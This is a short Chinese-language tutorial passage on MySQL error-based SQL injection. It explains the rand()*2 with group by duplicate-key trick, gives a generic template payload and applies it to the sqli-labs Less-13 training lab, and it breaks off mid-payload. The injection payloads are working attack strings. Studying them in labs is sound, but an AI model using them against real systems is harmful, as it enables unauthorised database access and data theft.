原理
原理是利用rand()*2重复计数和group by配合,导致临时表插入的主键重复以报错,不适用于表中只有2条数据以下的情况
标准payload:
//$$包含的是可变参数,[]内是可省略参数
$anything$ [前置参数闭合符号] [and|union] select count(*),concat(($payload$),floor(rand(0)*2)) as a from $table$ group by a [截断后置查询符号]
sqli-labs_Less13
只输入用户名admin时,POST数据为:
uname=admin&passwd=&submit=Submit
用户名处payload:
admin ') union select count(*),concat((database()),floor(rand(0